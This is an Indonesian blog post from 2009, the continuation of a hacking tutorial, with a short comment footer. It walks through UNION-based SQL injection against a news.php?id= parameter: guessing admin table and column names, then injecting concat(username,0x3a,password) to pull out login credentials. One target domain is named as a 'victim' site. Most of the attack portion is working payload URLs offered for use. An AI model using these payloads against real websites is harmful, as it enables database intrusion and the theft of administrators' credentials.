Inilah lanjutan dari SQL Injection yang lalu (maaf yaa kalo 2 postingan)
Lanjutan:
5. Mendapatkan nama table dan column
Jika versi MySQL-nya < 5 (i.e 4.1.33, 4.1.12...) kita harus menebaknya... Biasanya table bernama: user/s, admin/s, member/s Dan biasanya nama column-nya: username, user, usr, user_name, password, pass, passwd, pwd etc...
Contoh cek-nya: www.korbansqli.com/news.php?id=5 union all select 1,2,3 from admin/*
Coba kita main tebak-tebakan: www.site.com/news.php?id=5 union all select 1,username,3 from admin/* Kita masukin ke nomor 2 karena Angka yang ada tadi 2, jadi kita ganti 2 menjadi nama column Kalo salah, akan muncul error, dan jika benar, akan muncul di layar usernamenya seperti admin atau superadmin
Kita akan cari passwordnya www.site.com/news.php?id=5 union all select 1,password,3 from admin/* Jika error, gantilah nama yang lain selain password, jika benar, kita akan melihat password yang masih hash atau sudah plain text (sesuai databasenya)
Lalu, kita harus menyelesaikan Query ini (kata mpu Marezzi biar bagus :-) ) Pakailah Concat = concat()
Contoh: www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Note: Mpu Marezzi berkata, dia masukin 0x3a itu adalah hex value (jadi 0x3a adalah value dari column)
To be Continued Again (BANYAK BANGET!!!)
Sabtu, 05 September 2009
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar
Silahkan kasih komentar kepada saya, walaupun bagus, jelek, saya akan menerimanya, dan mengoreksinya... Kan gak ada yang sempurna kan? :D